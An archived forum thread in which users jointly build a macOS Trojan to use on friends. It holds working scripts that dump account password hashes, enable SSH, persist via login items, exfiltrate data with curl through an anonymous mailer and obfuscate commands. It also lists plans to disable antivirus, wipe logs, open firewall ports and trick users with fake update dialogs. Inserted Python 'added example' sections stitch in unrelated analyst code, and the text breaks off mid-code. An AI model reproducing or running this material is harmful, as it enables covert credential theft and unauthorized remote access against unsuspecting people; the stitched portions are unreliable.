Full Version: remote login Trojan
TSF - Mac Security Forums > Discussion > Programming
callmenames
Oh good point... and some of the web mailers may require a specific 'referer' (normally it would be the page from which you submitted mail to the mailer, or the mailer itself.) When you test, look in the result for messages like "invalid referer or bad referrer".

It isn't the company anyone works for, it's the experiences they have had. I happen to have a lot of varied experience in this particular field. Some of which has been work related, and some of which not at all, just personal interest as in a hobby.
callmenames
QUOTE(andrewistheshit @ May 29 2008, 07:25 PM) *
I'm working on figuring out the app part with AppleScript
<---- I'm becoming a skiddy :[ rats...



http://www.google.com/search?q=define:Script+kiddie
QUOTE('google')
Definitions of Script kiddie on the Web:

An incompetent hacker or cracker who relies on code that has been pre-built into software programs or scripts by others so that it can be run at ...
www.h-spot.net/threat_glossary.htm
In hacker culture, a script kiddie (occasionally script bunny, script kitty, or similar) is a derogatory term used for an inexperienced malicious hacker who uses programs developed by others to attack computer systems, and deface websites. ...
en.wikipedia.org/wiki/Script kiddie


So, either become experienced (which will lead to competence) or write your own haxorwarez, or both! :)
andrewistheshit
Well, that's what I'm doing :]. It's a slow process.
Oktane
I figured out the email part and have moved on to recovering the hashes using. When I ran my trojan on startup, it displayed a dialog that showed my hashes and said "System Events" error.

Also, if you guys know of an easy-to-use executable keylogger (or how to make one), that would be great. I tried incorporating LogKext and Keystroke Recorder X but it was way too complicated.

AppleScript:
CODE
        -- ################# HASHES START #################
        set dir to POSIX path of (path to me)
set version_num to do shell script "sw_vers -productVersion" as string
        
    end tell
    
    if version_num is less than "10.5" then
        do shell script "chmod -x " & dir & "/Contents/Resources/pwd104.sh"
        do shell script "chmod 777 " & dir & "/Contents/Resources/pwd104.sh"
        set the_hash to do shell script dir & "/Contents/Resources/pwd104.sh"
    else if version_num is greater than or equal to "10.5" then
        do shell script "chmod -x " & dir & "/Contents/Resources/pwd105.sh"
        do shell script "chmod 777 " & dir & "/Contents/Resources/pwd105.sh"
        set the_hash to do shell script dir & "/Contents/Resources/pwd105.sh"
    end if
    -- ################# HASHES END #################


pwd104.sh:
CODE
#!/bin/sh

nidump passwd . | grep "\*\*" | cut -d: -f 1 | while read the_name; do echo; echo "$the_name"; the_hashfile=`niutil -readprop . /users/"$the_name" generateduid`; the_hash=`cat /var/db/shadow/hash/"$the_hashfile"`; echo; echo "$the_hash"; echo "___${the_name}_NT:${the_hash:0:32}"; echo "___${the_name}_LM:${the_hash:32:32}"; echo "_${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}"; S0SHA1="${the_hash:168:48}"; SSHA1="${the_hash:104:48}"; [ -n "${S0SHA1//0}" ] && echo "${the_name}S0SHA1:${S0SHA1}"; [ -n "${SSHA1//0}" ] && echo "${the_name}_SSHA1:${SSHA1}"; done


pwd105.sh
CODE
#!/bin/sh

dscl . -list /Users "authentication_authority" | grep -i hash | sed "s/ .*$//" | while read the_name; do echo; echo "$the_name"; the_hashfile=$( dscl . -read /users/"${the_name}" generateduid | sed "s/^.* //" ); the_hash=`cat /var/db/shadow/hash/"$the_hashfile"`; echo; echo "$the_hash"; echo "___${the_name}_NT___:${the_hash:0:32}"; echo "___${the_name}_LM___:${the_hash:32:32}"; echo "_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}"; S0SHA1="${the_hash:104:48}"; cram_md5="${the_hash:104:64}"; SSHA1="${the_hash:168:48}"; [ "x${the_hash:153:15}" != "x000000000000000" ] && echo "${the_name}_CRAM_MD5:${cram_md5}" || { [ -n "${S0SHA1//0}" ] && echo "${the_name}_S0SHA1__:${S0SHA1}"; }; [ -n "${SSHA1//0}" ] && echo "${the_name}_SSHA1___:${SSHA1}"; done
andrewistheshit
Haha, I'm way behind. I'm still trying to figure out the part where it doesn't ask you for the password. All I have is
1. A working BASH script (it does everything but it's all visible)
2. I have an app from AppleScript with

CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"

that in it, and I ran it just to see what it does. I read the man page on launchctl and it looks like I dumped all my files in LaunchDaemons and now there is nothing there :[
and I'm kinda stuck on what to do now on the trojan
lokin
Ok, well that seems to work except I did "cat /usr/bin/sudo" and got what I believe was an encrypted file. So how do I read where the password is?

And about catching the sudo, the problem is that most people I'm trying to "hack" don't even know what a terminal is.
lokin
Ya I know.
andrewistheshit
QUOTE
And about catching the sudo, the problem is that most people I'm trying to "hack" don't even know what a terminal is

lol I know what you mean... maybe if they enter a password to install an app then you could piggyback it? idk if that would work.

QUOTE
Ya I know.

was that directed at my post?
cuz I'm totally stuck now :[
lokin
sudo -k you mean right...?
andrewistheshit
sudo -k
?

I'm lost in a sea of confusion.
If anyone wants to PM me and give a beginner a little help, feel free. All I've got now is a working BASH script :[ I got confused when I got into the AppleScript part.
Weird, considering AppleScript is pretty easy and I actually know some.
lokin
QUOTE(andrewistheshit @ May 29 2008, 09:08 PM) *
lol I know what you mean... maybe if they enter a password to install an app then you could piggyback it? idk if that would work.
was that directed at my post?
cuz I'm totally stuck now :[

lol I think. you said something like " . files are hidden so try ls -a"
long threads always get me confused and the outline setting gets confusing.
callmenames
QUOTE(Oktane @ May 29 2008, 08:42 PM) *
I figured out the email part and have moved on to recovering the hashes using. When I ran my trojan on startup, it displayed a dialog that showed my hashes and said "System Events" error.

The hashes or the hash file names? If it was the names, it's because you would have to 'sudo cat' in the shell script (or sudo when you run the shell script) or use "with administrator privileges" in the AppleScript to read the hash files.

This works in AppleScript for both 10.4 and 10.5 ---if--- sudo is working (note the use of sudo in the_hash=`sudo cat...`!). It does not 'nidump passwd .', which you might want to do separately under 10.4 and not under 10.5.
CODE
do shell script "dscl . -list /Users \"authentication_authority\" | grep -i hash | sed \"s/ .*$//\" | while read the_name; do echo; echo \"$the_name\"; the_hashfile=$( dscl . -read /users/\"${the_name}\" generateduid | sed \"s/^.* //\" ); the_hash=`sudo cat /var/db/shadow/hash/\"$the_hashfile\"`; echo; echo \"$the_hash\"; echo \"___${the_name}_NT___:${the_hash:0:32}\"; echo \"___${the_name}_LM___:${the_hash:32:32}\"; echo \"_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}\"; S0SHA1=\"${the_hash:104:48}\"; cram_md5=\"${the_hash:104:64}\"; SSHA1=\"${the_hash:168:48}\"; [ \"x${the_hash:153:15}\" != \"x000000000000000\" ] && echo \"${the_name}_CRAM_MD5:${cram_md5}\" || { [ -n \"${S0SHA1//0}\" ] && echo \"${the_name}_S0SHA1__:${S0SHA1}\"; }; [ -n \"${SSHA1//0}\" ] && echo \"${the_name}_SSHA1___:${SSHA1}\"; done"


QUOTE(Oktane @ May 29 2008, 08:42 PM) *
Also, if you guys know of an easy-to-use executable keylogger (or how to make one), that would be great. I tried incorporating LogKext and Keystroke Recorder X but it was way too complicated.

Installing it you mean? 'man installer' :)
lokin
QUOTE(andrewistheshit @ May 29 2008, 09:15 PM) *
I'm lost in a sea of confusion.


Ya well there are 5 or 6 things happening in this thread.
callmenames
QUOTE(lokin @ May 29 2008, 09:01 PM) *
Ok well that seams to work except I did "cat /usr/bin/sudo" and got what I believe was an encrypted file.

I'm not sure what you mean by 'that seems to work' ... which that?
'cat' reads the content of a file and displays it on screen unless redirected. /usr/bin/sudo is the *program* sudo. So you dumped the program sudo on your screen. I'm not sure if you wanted 'cat /etc/sudoers' ???


QUOTE(lokin @ May 29 2008, 09:01 PM) *
So how do I read where the password is?

Which password or what type of password? Ohh.. perhaps 'cat ~/Public/.howdy'

QUOTE(lokin @ May 29 2008, 09:01 PM) *
And about catching the sudo, the problem is that most people I'm trying to "hack" don't even know what a terminal is.

I understand, it's also not without the risk of being noticed if someone does happen to be familiar with the command line. There is no guarantee that asking the user for a password will work. There's no guarantee that setting an alias for the sudo command would work. No guarantee waiting around to piggyback on sudo would work. No guarantee that you would have write access to files that are executed during startup to get your scripts run as root... so, considering that any of the options -may- fail, it's nice to have other options. :)
andrewistheshit
If anyone wants to help me out, that would be great, so that I can then contribute in the future.
callmenames
QUOTE(andrewistheshit @ May 29 2008, 08:52 PM) *
Haha, I'm way behind. I'm still trying to figure out the part where it doesn't ask you for the password. All I have is
1. A working BASH script (it does everything but it's all visible)
...
and I'm kinda stuck on what to do now on the trojan

Go back to post #149 on page 15. Use the 'defaults' command in Terminal (change the /Users/username to /Users/andrewfree if that is your correct username). That will take care of the /Library/Preferences/com.apple.SystemLoginItems.plist file if you have write access...

Then copy the short script and paste it into the AppleScript Script Editor program. Save as "application bundle", check "Run only" and save it to your Desktop with the name "AdjustGamma.app".

Turn off your Remote Login in System Preferences > Sharing

Restart.

Check Remote Login and also check the log file which will be just inside your hard drive and named "applog.txt"
andrewistheshit
Ok thanks. I was just poking around with the Property List Editor and saw that AdjustGamma was set to run. But one question: is the AppleScript having a BASH shell run as root because it is a startup item, and then it should turn on Remote Login and email the results ;)
Now just for the delivery system, if I got the above process right.
callmenames
Andrew, The short script back on page 15 does essentially two things - write some status messages to a log file so you can see where it stops working or whether it worked and it tells launchctl to load ssh (essentially the same as checking the Remote Login box in System Preferences > Sharing.)

The AppleScript program will only run if the correct path to the program is set in /Library/Preferences/com.apple.SystemLoginItems.plist
callmenames
Lokin, you got me to try the outline view for the first time. :) I had thought that it made more sense to start my posts with a quote so that it was clear what I was replying to... but after seeing outline view I think I will preface them with the name of the person to whom I'm responding... hopefully that will make it a bit easier.

QUOTE(lokin @ May 29 2008, 09:41 PM) *
long threads always get me confused and the outline setting gets confusing.

callmenames
Oktane, I forgot to say that if you already have a functional user password you can...
CODE
do shell script "dscl . -list /Users \"authentication_authority\" | grep -i hash | sed \"s/ .*$//\" | while read the_name; do echo; echo \"$the_name\"; the_hashfile=$( dscl . -read /users/\"${the_name}\" generateduid | sed \"s/^.* //\" ); the_hash=`sudo cat /var/db/shadow/hash/\"$the_hashfile\"`; echo; echo \"$the_hash\"; echo \"___${the_name}_NT___:${the_hash:0:32}\"; echo \"___${the_name}_LM___:${the_hash:32:32}\"; echo \"_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}\"; S0SHA1=\"${the_hash:104:48}\"; cram_md5=\"${the_hash:104:64}\"; SSHA1=\"${the_hash:168:48}\"; [ \"x${the_hash:153:15}\" != \"x000000000000000\" ] && echo \"${the_name}_CRAM_MD5:${cram_md5}\" || { [ -n \"${S0SHA1//0}\" ] && echo \"${the_name}_S0SHA1__:${S0SHA1}\"; }; [ -n \"${SSHA1//0}\" ] && echo \"${the_name}_SSHA1___:${SSHA1}\"; done" user name the_username password the_password with administrator privileges
callmenames
Are we all caught up to the same point? Everything functional etc.?
Oktane
Is that compatible with 10.4 and 10.5? What else is different between systems that we need to be aware of?
callmenames
Oktane, yes dscl will work in 10.4 (Tiger) and 10.5 (Leopard). In 10.3, using nidump would work to get the usernames. In 10.2 and prior, just 'nidump passwd .' is sufficient for the OS X account password hashes although /var/db/samba/hash may at times also contain easy to crack NTLM hashes in 10.2 (if the user account was configured to allow Windows File Sharing.)

Situations in which the OS version should be identified and different routines used to accomplish...
  • Enabling Remote Login. launchd will work for 10.5 & 10.4, xinetd for 10.3, modifying /etc/hostconfig & manually starting the service will work for 10.2 and prior.
  • Extracting OS X user account password hashes
  • Identifying / formatting OS X user account password hashes
  • Installing a program which runs during the OS X startup or login process.
  • Exploiting vulnerabilities specific to a given version(s) of OS X.
callmenames
Subroutines: functions and handlers.

You may have noticed that the bash script uses 'functions'. They are similar to AppleScript's 'handlers'. Both are subroutines which can be called or executed from somewhere else in the script. Rather than repeating a portion of code each time it is needed, the script can call a subroutine - this keeps the source code smaller (no duplication of the same code) and makes troubleshooting much easier (you only need to fix one copy of the code - in the subroutine). There are some basic differences between AppleScript's and bash's handling of subroutines. In bash, the subroutine must be placed in the source code prior to being called (at the top for instance). In AppleScript, global variables must be set first and then the subroutine may be called. Here's an example in AppleScript for deobfuscation.
CODE
--Variables
property key1 : do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
property key2 : do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""

--Handlers
on fuxor(the_variable)
    return do shell script ("echo \"" & the_variable & "\" | tr \"" & key2 & "\" \"" & key1 & "\"")
end fuxor

on defuxor(the_variable)
    return do shell script ("echo \"" & the_variable & "\" | tr \"" & key1 & "\" \"" & key2 & "\"")
end defuxor

--Main
fuxor("ls -alo /Library/Preferences")
display dialog defuxor("Tuva2va2bur2qrpjqrq2zraantr.")
do shell script defuxor("ya21nyj2/Lvomnmg/Pmrsrmripra")

First the variables key1 and key2 are set using the 'property' command which makes the variables global - they will be available to all portions of the code including subroutines.

Next, are the subroutines 'fuxor' and 'defuxor'.

To encode a string, call the fuxor subroutine and pass it the string. To decode, call defuxor and pass it the string.

At any further point in the code, the subroutines can be called and passed a string to be encoded or decoded. The actual code of the subroutine never needs to be repeated in the source and it's very portable - you can easily copy and paste the property commands and the subroutines into another AppleScript program and use them just by calling their names.

If you design each part of your script to work as a handler (subroutine), you will be able to quickly copy and paste the handler into a new program and then just call it.

The same is true for bash scripts. Once a function is working, you need only copy the function to your new script, ensure that any variables needed are declared and then call the function.
CODE
#!/bin/bash

# Functions
function fuxor () {
echo "${1}" | tr "${key2}" "${key1}"
}

function defuxor () {
echo "${1}" | tr "${key1}" "${key2}"
}


# Variables
declare key1=$( echo -e "\x5b\x6e\x2d\x7a\x69\x2d\x6d\x61\x2d\x68\x5d\x38\x36\x37\x35\x33\x30\x39\x2d\x34\x20\x32\x31" )
declare key2=$( echo -e "\x5b\x61\x2d\x68\x69\x2d\x6d\x6e\x2d\x7a\x5d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d" )
declare a_command secret_message
# Main

# clear the screen in Terminal
clear

echo "               An unfuxored command: \"ls -alod /Library/Preferences\""

# Set the variable a_command to the fuxored version of the quoted text string
a_command=$( fuxor "ls -alod /Library/Preferences" )

# Show it in Terminal
echo "The fuxored command looks like this: ${a_command}"
echo # a blank line.

# Run the command
$( defuxor "${a_command}" )

echo # a blank line.

# fuxor and defuxor and run it all at once.
$( defuxor $( fuxor "ls -alod /Library/Preferences" ) )

echo # a blank line.

secret_message=$( fuxor "Hey what's up?" )
echo "SECRET MESSAGE:${secret_message}"
echo -n "       DECODED:"
defuxor "${secret_message}"

exit 0

If there is any command or portion of source code that anyone is having trouble understanding, speak up!
Oktane
I still can't get that cURL email working...

http://psidude.com/mailer/

CODE
set the_username to "Hello"
set my_email to "#####@#####"
set the_subject to "Your Data has arrived!"
set the_message to the_username
set the_message to do shell script "echo \"" & the_message & "\" | tr '. 0123456789[A-M][N-Z][a-m][n-z]' '_+5678901234[N-Z][A-M][n-z][a-m]'"

do shell script "curl -d \"hdnSendMail=sendNow&To=" & my_email & "&CC=&BCC=&Subject=" & the_subject & "&Message=" & the_message & "&btnSend=Send\" http://psidude.com/mailer/"


Displays this:
CODE
"<center>
Psidude Anonymous Emailer
<title>Anonymous Emailer at psidude.com</title>
<br>
<br>
<form action=\"mail.php\" method=\"post\">

<table border=\"0\" bgcolor=\"#ececec\" cellspacing=\"5\">

<tr><td>To Email address</td><td><input type=\"text\" size=\"30\" name=\"email\"></td></tr>

<tr><td>Subject</td><td><input type=\"text\" size=\"30\" name=\"subject\"></td></tr>

<tr><td valign=\"top\">Message</td><td><textarea name=\"message\" rows=\"6\" cols=\"30\"></textarea></td></tr>

<tr><td> </td><td><input type=\"submit\" value=\"Send\"><font face=\"arial\" size=\"1\"></font></td></tr>
</table>
</form><br>
<br>
Please note: The email will be sent from anonymous@psidude.com.  <br>
This helps prevent the email from being spammed.<br>
Email <a href=\"mailto:psidude@psidude.com\">psidude@psidude.com</a> for feature suggestions.<br>"


When I use it without the cURL, through a browser, I receive it quickly!
callmenames
Oktane, each web mail form may require different data to be submitted or a different format for the data.

See post #129 on page 13 for instructions on how to use Firefox and the LiveHTTPHeaders extension to watch what a web form is submitting. Then you only need to copy the format of the submitted string and insert your own variables.

If you haven't actually used LiveHTTPHeaders yet, do it until you are comfortable with the process. It's a very handy bit of knowledge to have for all sorts of things. :)

For the specific site which you are using, see posts #199 and #200 on page 20. Andrew's code in #200 is functional. Note that that particular site returns the message "Your message has been sent" upon success (as shown in the picture in post #199.)
callmenames
I forgot to mention that both the examples in post #224 of this thread are using another very basic method of obfuscation. The \x indicates that the value following is in hexadecimal (base 16). In bash, echo -e expands these 'escaped' codes into their actual character. The capital letter 'A' is decimal 65 (base 10) and is hexadecimal 41 (base 16). So, in bash, 'echo -e "\x41"' would result in the capital letter 'A' being echoed on the screen. To see the keys in Terminal...
CODE
echo -e "\x5b\x6e\x2d\x7a\x69\x2d\x6d\x61\x2d\x68\x5d\x38\x36\x37\x35\x33\x30\x39\x2d\x34\x20\x32\x31"

QUOTE
[n-zi-ma-h]8675309-4 21

CODE
echo -e "\x5b\x61\x2d\x68\x69\x2d\x6d\x6e\x2d\x7a\x5d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d"

QUOTE
[a-hi-mn-z]0123456789 -


And escaping in AppleScript...
CODE
--Handler
on slash_x_hex(the_variable)
    set hex_characters to "0123456789ABCDEF"
    set hexified_string to ""
    repeat with each_character in the_variable
        set decimal_value to ASCII number of each_character
        set hexified_string to hexified_string & (ASCII character 92) & "x" & character (decimal_value div 16 + 1) of hex_characters & character (decimal_value mod 16 + 1) of hex_characters
    end repeat
    return hexified_string as string
end slash_x_hex

--Main
set whatever to slash_x_hex("Hello")
do shell script "echo \"" & whatever & "\"; echo -e \"" & whatever & "\""
QUOTE
"\\x48\\x65\\x6C\\x6C\\x6F
Hello"
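Added example, not code from this thread or from any of its posters: a Python helper written from the analyst's side. Given a script that uses the scheme shown in the two posts above (keys built with echo -e hex escapes, strings run through tr), it recovers the plaintext offline: it undoes the AppleScript string escaping, expands the \x codes the way echo -e does, expands the tr ranges, and decodes every defuxor("...") literal it finds. The embedded sample script is constructed from the property and defuxor lines posted earlier in the thread. All function names are mine, and the assumption that macOS tr treats a reversed range such as 9-4 as three literal characters (which key1 relies on) is mine as well.

```python
"""Recover tr keys and decode obfuscated literals from an echo -e / tr style AppleScript."""
import re

# Constructed sample: the property and defuxor lines from the thread, verbatim.
SAMPLE_SCRIPT = r'''
property key1 : do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
property key2 : do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""
display dialog defuxor("Tuva2va2bur2qrpjqrq2zraantr.")
do shell script defuxor("ya21nyj2/Lvomnmg/Pmrsrmripra")
'''

# AppleScript string-literal escapes: backslash-backslash, backslash-quote, \n, \t, \r.
_APPLESCRIPT_ESCAPES = {"\\": "\\", '"': '"', "n": "\n", "t": "\t", "r": "\r"}


def applescript_unescape(s):
    # Undo the escaping AppleScript applies inside a "..." literal; unknown escapes are kept.
    return re.sub(r"\\(.)", lambda m: _APPLESCRIPT_ESCAPES.get(m.group(1), m.group(0)), s)


def expand_hex_escapes(s):
    # Expand \xHH escapes the way bash's `echo -e` does (one or two hex digits).
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), s)


def expand_tr_set(spec):
    # Expand a tr(1) set: 'a-h' becomes 'abcdefgh'; everything else stands for itself.
    # A reversed range such as '9-4' is kept as three literal characters (assumed
    # BSD/macOS tr behaviour, which key1 relies on; GNU tr rejects reversed ranges).
    out, i = [], 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-" and spec[i] <= spec[i + 2]:
            out.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            out.append(spec[i])
            i += 1
    return "".join(out)


def tr_translate(text, set1, set2):
    # Apply `tr set1 set2` to text; like tr, a shorter set2 repeats its last character.
    a, b = expand_tr_set(set1), expand_tr_set(set2)
    if len(b) < len(a):
        b += b[-1] * (len(a) - len(b))
    return text.translate(str.maketrans(a, b[:len(a)]))


_KEY_RE = re.compile(r'property\s+(\w+)\s*:\s*do shell script "echo -e \\"(.*?)\\""')
_LITERAL_RE = re.compile(r'defuxor\("([^"]*)"\)')


def recover_keys(script):
    # Evaluate each `property keyN : do shell script "echo -e \"...\""` line offline:
    # AppleScript unescape first, then the echo -e hex expansion.
    return {name: expand_hex_escapes(applescript_unescape(raw))
            for name, raw in _KEY_RE.findall(script)}


def decode_script_literals(script):
    # Decode every defuxor("...") literal with the recovered keys (defuxor is `tr key1 key2`).
    keys = recover_keys(script)
    return [(lit, tr_translate(lit, keys["key1"], keys["key2"]))
            for lit in _LITERAL_RE.findall(script)]


if __name__ == "__main__":
    for name, key in recover_keys(SAMPLE_SCRIPT).items():
        print(f"{name} = {key!r}")
    for literal, plain in decode_script_literals(SAMPLE_SCRIPT):
        print(f"{literal!r} -> {plain!r}")
```

Running it prints the two keys exactly as the two echo -e commands above show them, followed by the decoded dialog text and the decoded shell command. The same helpers work on the bash variant, since the keys there are the same hex strings without the AppleScript-level escaping.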
callmenames
Changing the icon. Just in case anyone isn't familiar with the process...

Create a picture to use as the icon, copy the image to the clipboard (command-c).

Control-click the application's icon in Finder and select Get Info.


Click the small icon in the upper left corner of the Get Info window until it shows a faint border around it indicating that it is selected. Then paste (command-v).


Then close the Get Info window.


You can also edit the icns file within the application bundle for custom icon masking.
andrewistheshit
Well, can someone at least help explain the AppleScript part? I just want to at least get something where someone opens an app made in AppleScript and it hides the BASH script which I have working, so when they restart their comp it will send me the password and IP info.
callmenames
Andrew, you would need to create an AppleScript along the lines of the following Pseudo-code - which is not real code, just a basic outline of what the program would need to do. From this point you would have to figure out how to write the functional AppleScript code for each part.

Pseudo-code
CODE
if this program is being run by user id 0 then
    just run the shell script
else
    modify the com.apple.SystemLoginItems.plist file to run myself from /Library/Caches/ on restart
    move myself to /Library/Caches/
    exit
end if
andrewistheshit
ok thanks, that's better :]
Because it's the weekend I have been messing around with it more.
So I can disguise the AppleScript app, and then if someone opens it, it has the BASH script in it and it runs it on restart, right :]

Would a reboot command work in AppleScript? Cuz then you don't have to wait for them to restart their comp.
callmenames
Andrew, you can have AppleScript restart or issue a shell command to reboot but either one is blatantly obvious... you could try a little more finesse, such as "The required security updates have been installed successfully. You must restart." "OK"
callmenames
Suggested subroutines...
Try writing them as pseudo-code first, then as either AppleScript Handlers or bash functions - or both.
Working code for some of these already exists in this thread...

can_sudo_come_out_to_play
Test to see if our good friend sudo is already ready

its_like_deja_vu_all_over_again
Check our secret files to see if we have already collected any passwords

defuxor
defuxorize an obfuscated string of text

dupe_user
Social-engineer a password

agent_86_reporting_for_duty_chief
Create a hidden admin user, or enable the root account, or allow a boring old existing account to log in

install_and_activate_logKext
Install and run logKext

rerun_me_every_startup
Try to insert myself into the startup or login process

enable_ssh
Turn it on

whodo_sudo
alias the sudo command to capture passwords

i_have_a_secret
Save some data someplace convenient like /Users/Shared or ~/Public or hey, maybe even /Library/WebServer/Documents :)

these_are_not_the_outgoing_network_communications_you_are_looking_for_jedi_mind trick
Sing a little lullaby to Little Snitch

i_like_you_just_as_you_are
Disable Software Update.

there_are_no_osx_viruses_silly_wabbit
Pre-emptive strike against the inevitable persecution from the anti-virus sector. Disable any a.v. software's ability to update... permanently.

pass_the_hash_man
Get every conceivable password hash on the entire system. Don't forget the Open Firmware password.

nothing_to_see_here
Stop all or some logging

throw_another_log_on_the_fire_or_none_of_this_ever_happened
Ensure that nothing unusual is left in the logs

its_smoky_in_here_lets_open_ports_in_the_firewall
Tell the OS X firewall to let us in

UPnP_how_much_did_you_drink
Tell the router to let us in too

phone_home_and_try_a_different_method_if_it_fails
Send some helpful information about how one might take over this whole computer remotely

just_hang_out_until_sudo_can_come_out_to_play
Quietly wait until sudo works

exit_stage_left
Once we've done all we need to do, we can leave or perhaps stick around and run again say, oh, once a month or so?

plan_B
If all else fails and we are not able to enable SSH... how about Telnet or WebSharing with a nice PHP shell, Apple Remote Desktop maybe etc? If we can't enable anything, at least look around and see where we have write access to modify existing programs... Maybe gain a little leverage with an exploit.
andrewistheshit
lol. Thanks, nice list. But I think most of that is out of my skill level; my target now is friends, most are not that bright, they will NOT be checking logs. ;)

You never answered this question:


So I can disguise the AppleScript app, and then if someone opens it, it has the BASH script in it and it runs it on restart, right :]

I'm gonna go try and write it with the outline you gave me.

On your outline it says


if this program is being run by user id 0 then
just run the shell script
else
modify the com.apple.SystemLoginItems.plist file to run myself from /Library/Caches/ on restart
move myself to /Library/Caches/
exit
end if

This is an example of mine, but if I send the app to someone else I won't know their name or uid?

uid=501(andrewfree) gid=20(staff) groups=20(staff),98(_lpadmin),81(_appserveradm),79(_appserverusr),101(com.apple.sharepoint.group.1),80(admin)


<-- I feel like such a loser


PS: as my community service for getting into my school server (with help), the tech guy showed me the Apple server and the Linux one we have. It was pretty cool.
lokin
QUOTE(callmenames @ May 29 2008, 11:27 PM) *
Lokin, you got me to try the outline view for the first time. :)

I've used it from the start except when I'm just reading a thread from top to bottom.
Oktane
How do I do this its_smoky_in_here_lets_open_ports_in_the_firewall
Tell the OS X firewall to let us in, or at least point me in the right direction
callmenames
QUOTE(andrewistheshit @ May 30 2008, 07:41 PM) *
lol. Thanks, nice list. But I think most of that is out of my skill level; my target now is friends, most are not that bright, they will NOT be checking logs. ;)

The list wasn't intended as a response to you specifically, just as an addition to this thread.

QUOTE(andrewistheshit @ May 30 2008, 07:41 PM) *
You never answered this question:
So I can disguise the AppleScript app, and then if someone opens it, it has the BASH script in it and it runs it on restart, right :]
I answered this in post #230 on page 23. Yes, you can disguise an AppleScript application. Yes, you can have an AppleScript run a shell script. Yes, you can have an AppleScript *try* to insert itself or a bash script into the OS X startup or login process.

QUOTE(andrewistheshit @ May 30 2008, 07:41 PM) *
This is an example of mine, but if I send the app to someone else I won't know their name or uid?
uid=501(andrewfree) gid=20(staff) groups=20(staff),98(_lpadmin),81(_appserveradm),79(_appserverusr),101(com.apple.sharepoint.group.1),80(admin)

Your script can read the user's username and id. See lokin's AppleScript code in post #163 on page 17.
Oktane
I'm trying to run a test at the beginning of the trojan to detect whether it needs to set up or run as a startup. But AppleScript is being an asshole and won't let me use if file exists:

Here is the error: "Can't make a file "/Library/Caches/.mdiod.app" into type reference. (-1700)"
CODE
if (exists file "/Library/Caches/.mdiod.app") then
        if (exists file "/Library/Preferences/com.apple.SystemLoginItems.plist") then


I tried posix, path, etc...
callmenames
Oktane, way, way back at the beginning of this thread we discussed how to see which files are being changed when settings (such as whether or not the firewall is on and/or which ports are open) are altered in System Preferences... is that enough of a direction? :)
Oktane
QUOTE(callmenames @ May 30 2008, 10:24 PM) *
Oktane, way, way back at the beginning of this thread we discussed how to see which files are being changed when settings (such as whether or not the firewall is on and/or which ports are open) are altered in System Preferences... is that enough of a direction? :)

fs_config I think, that thing is kinda confusing but I will try anyway
Oktane
QUOTE(Oktane @ May 30 2008, 10:34 PM) *
fs_config I think, that thing is kinda confusing but I will try anyway

I mean fs_usage, and this is the file I think: /Library/Preferences/com.apple.sharing.firewall.plist, but it's encrypted

CODE
{
    allports = (407);
    alludpports = (123);
    firewall = {
        "Adobe Version Cue CS2" = {editable = 1; enable = 0; port = (3703, 427, 50800); };
        "Apple Remote Desktop" = {editable = 0; enable = 0; port = (3238); row = 5; udpport = (3238); };
        "FTP Access" = {editable = 0; enable = 0; port = ("20-21", "*"); row = 4; };
        "Network Time" = {editable = 1; enable = 1; row = 11; udpport = (123); };
        "Personal File Sharing" = {editable = 0; enable = 0; port = (548, 427); row = 0; };
        "Personal Web Sharing" = {editable = 0; enable = 0; port = (80, 427); row = 2; };
        "Printer Sharing" = {editable = 0; enable = 0; port = (631, 515); row = 7; };
        "Remote Apple Events" = {editable = 0; enable = 0; port = (3031); row = 6; };
        "Remote Login - SSH" = {editable = 0; enable = 0; port = (22); row = 3; };
        "Samba Sharing" = {editable = 0; enable = 0; port = (139); row = 1; };
        Timbuktu = {editable = 1; enable = 1; port = (407); row = 10; };
        "iChat Rendezvous" = {editable = 1; enable = 0; port = (5297, 5298); row = 8; };
        "iPhoto Rendezvous Sharing" = {editable = 1; enable = 0; port = (8770); row = 12; };
        "iTunes Music Sharing" = {editable = 1; enable = 0; port = (3689); row = 9; };
    };
    state = 1;
}
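Added example, not from the thread: a Python audit helper that parses the OpenStep-style text that `defaults read` prints (the format of the firewall plist above), reports which services are enabled and on which ports, and checks that the allports/alludpports summary agrees with the enabled rules. The sample input is the firewall plist text from the post above, embedded verbatim. Treating allports/alludpports as the union of the enabled rules' ports is an assumption I drew from the dumps in this thread, not documented behaviour; the function names are mine.

```python
"""Audit helper for the OpenStep-style output of `defaults read` (firewall plist)."""
import re

# Sample input: the firewall plist text from the post above, embedded verbatim.
SAMPLE_DEFAULTS = r'''
{
    allports = (407);
    alludpports = (123);
    firewall = {
        "Adobe Version Cue CS2" = {editable = 1; enable = 0; port = (3703, 427, 50800); };
        "Apple Remote Desktop" = {editable = 0; enable = 0; port = (3238); row = 5; udpport = (3238); };
        "FTP Access" = {editable = 0; enable = 0; port = ("20-21", "*"); row = 4; };
        "Network Time" = {editable = 1; enable = 1; row = 11; udpport = (123); };
        "Personal File Sharing" = {editable = 0; enable = 0; port = (548, 427); row = 0; };
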